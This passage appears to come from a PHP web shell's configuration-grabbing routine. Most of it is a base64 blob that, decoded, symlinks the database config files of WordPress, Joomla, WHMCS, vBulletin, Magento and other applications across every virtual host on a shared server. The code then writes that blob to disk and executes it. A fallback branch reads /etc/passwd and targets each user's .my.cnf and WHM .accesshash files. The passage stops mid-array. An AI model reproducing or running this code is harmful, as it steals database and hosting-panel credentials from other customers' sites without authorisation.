dXJlLnBocCcsJHNpdGVzcy4nLXNhbGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnLmluYy5waHAnLCRzaXRlc3MuJy1hbWVtYmVyMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXJzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictbWVtYmVycy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlczEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWZvcnVtLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtcy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictZm9ydW1zLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmYucGhwJywkc2l0ZXNzLictNS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictNC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dwL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvV1Avd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ByZXNzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLXByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Jsb2cvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93b3JkcHJlc3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ldy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLW5ldy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9nL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmxvZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9ncy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLWJsb2dzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1ob21lLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Byb3RhbC93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3Mtc2l0ZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYWluL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy90ZXN0L3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtdGVzdC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJjYWRlL2Z1bmN0aW9ucy9kYmNsYXNzLnBocCcsJHNpdGVzcy4nLWlicHJvYXJjYWRlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2pvb21sYS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9qb28vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb28udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY21zL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLWNtcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXNpdGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1tYWluLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtaG9tZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92Yi9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmJ+Y29uZmlnLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiMy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIzfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jYy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIxfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bS9pbmNsdWRlcy9jbGFzc19jb3JlLnBocCcsJHNpdGVzcy4nLXZibHV0dGlufmNsYXNzX2NvcmUucGhwLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAxLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NjL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobTE1LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NlbnRyYWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tY2VudHJhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0td2htY3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htL1dITUNTL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLVdITUNTLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobWMvV0hNL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htYy1XSE0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zZWN1cmUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdWN1cmUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1Y3VyZS13aG0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VjdXJlLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NwYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNwYW5lbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXBhbmVsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VibWl0dGlja2V0LnBocCcsJHNpdGVzcy4nLXdobWNzMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50ZXMvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudHN1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRzdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5nLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYW5hZ2UvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tbWFuYWdlLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1teS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLW15c2hvcC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictemVuY2FydC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXplbmNhcnQudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC1aQ3Nob3AudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc21mL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZjIudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW1zL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bXMudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJ0aWNsZS9jb25maWcucGhwJywkc2l0ZXNzLictTndhaHkudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy11cDIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZl9nbG9iYWwucGhwJywkc2l0ZXNzLictNi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlL2RiLnBocCcsJHNpdGVzcy4nLTcudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29ubmVjdC5waHAnLCRzaXRlc3MuJy1QSFAtRnVzaW9uLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21rX2NvbmYucGhwJywkc2l0ZXNzLictOS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlcy9kZWZhdWx0L3NldHRpbmdzLnBocCcsJHNpdGVzcy4nLURydXBhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXIvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy0xbWVtYmVyLnR4dCcpIDsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZ3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5ncy50eHQnKSA7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3JlcXVpcmVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1BTTRTUy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3N1cHBvcnRzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1zdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtYmlsbGluZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1iaWxsaW5ncy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0L2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3QudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdHMvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmdzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RpbmdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RiaWxsaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RiaWxsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcC9ldGMvbG9jYWwueG1sJywkc2l0ZXNzLictTWFnZW50by50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictT3BlbmNhcnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnL3NldHRpbmdzLmluYy5waHAnLCRzaXRlc3MuJy1QcmVzdGFzaG9wLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZy9rb25la3NpLnBocCcsJHNpdGVzcy4nLUxva29tZWRpYS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9sb2tvbWVkaWEvY29uZmlnL2tvbmVrc2kucGhwJywkc2l0ZXNzLictTG9rb21lZGlhLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NsY29uZmlnLnBocCcsJHNpdGVzcy4nLVNpdGVsb2NrLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcGxpY2F0aW9uL2NvbmZpZy9kYXRhYmFzZS5waHAnLCRzaXRlc3MuJy1FbGxpc2xhYi50eHQnKTsNCn0NCnByaW50ICJMb2NhdGlvbjogLi9cblxuIjs=";\r\n\t\t$file = "idx_config/vhost.cin";\r\n\t\t$handle = fopen($file ,"w+");\r\n\t\tfwrite($handle ,base64_decode($vhost));\r\n\t\tfclose($handle);\r\n\t\tchmod($file, 0755);\r\n\t\tif(exe("cd idx_config && ./vhost.cin")) {\r\n\t\t\techo "
Done
";\r\n\t\t} else {\r\n\t\t\techo "
Done
";\r\n\t\t}\r\n\r\n\t} else {\r\n\t\t$etc = fopen("/etc/passwd", "r") or die("
Can\'t read /etc/passwd
");\r\n\t\twhile($passwd = fgets($etc)) {\r\n\t\t\tif($passwd == "" || !$etc) {\r\n\t\t\t\techo "Can\'t read /etc/passwd";\r\n\t\t\t} else {\r\n\t\t\t\tpreg_match_all(\'/(.*?):x:/\', $passwd, $user_config);\r\n\t\t\t\tforeach($user_config[1] as $user_idx) {\r\n\t\t\t\t\t$user_config_dir = "/home/$user_idx/public_html/";\r\n\t\t\t\t\tif(is_readable($user_config_dir)) {\r\n\t\t\t\t\t\t$grab_config = array(\r\n\t\t\t\t\t\t\t"/home/$user_idx/.my.cnf" => "cpanel",\r\n\t\t\t\t\t\t\t"/home/$user_idx/.accesshash" => "WHM-accesshash",\r\n\t\t\t\t\t\t\t"$user_config_dir/po-content/config.php" => "Popoji",\r\n\t\t\t\t\t\t\t"$user_config_dir/vdo_config.php" => "Voodoo",\r\n\t\t\t\t\t\t\t"$user_config_dir/bw-configs/config.ini" => "BosWeb",\r\n\t\t\t\t\t\t\t"$user_config_dir/config/koneksi.php" => "Lokomedia",\r\n\t\t\t\t\t\t\t"$user_config_dir/lokomedia/config/koneksi.php" => "Lokomedia",\r\n\t\t\t\t\t\t\t"$user_config_dir/clientarea/configuration.php" => 